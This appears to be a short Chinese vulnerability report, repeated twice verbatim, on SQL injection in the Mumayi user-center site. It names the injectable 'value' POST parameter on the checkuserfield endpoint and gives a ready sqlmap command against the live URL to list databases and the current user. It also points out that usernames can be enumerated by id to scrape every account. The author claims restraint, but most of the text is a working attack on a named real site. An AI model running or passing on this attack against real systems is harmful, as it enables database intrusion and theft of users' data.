木蚂蚁用户中心 找回密码出存在sql注入
http://u.mumayi.com/?a=retrievepass
本身设计的也有问题 可以根据id来查看用户名 直接可以爬取所有用户 (友情提示)
http://u.mumayi.com/?a=checkuserfield
post:field=username&value=111 (value存在注入)
sqlmap -u "http://u.mumayi.com/?a=checkuserfield" --data "field=username&value=111" -p "value"
--dbs
--current-user
狗哥说的敏感数据观 我很赞同,点到为止
木蚂蚁用户中心 找回密码出存在sql注入
http://u.mumayi.com/?a=retrievepass
本身设计的也有问题 可以根据id来查看用户名 直接可以爬取所有用户 (友情提示)
http://u.mumayi.com/?a=checkuserfield
post:field=username&value=111 (value存在注入)
sqlmap -u "http://u.mumayi.com/?a=checkuserfield" --data "field=username&value=111" -p "value"
--dbs
--current-user
狗哥说的敏感数据观 我很赞同,点到为止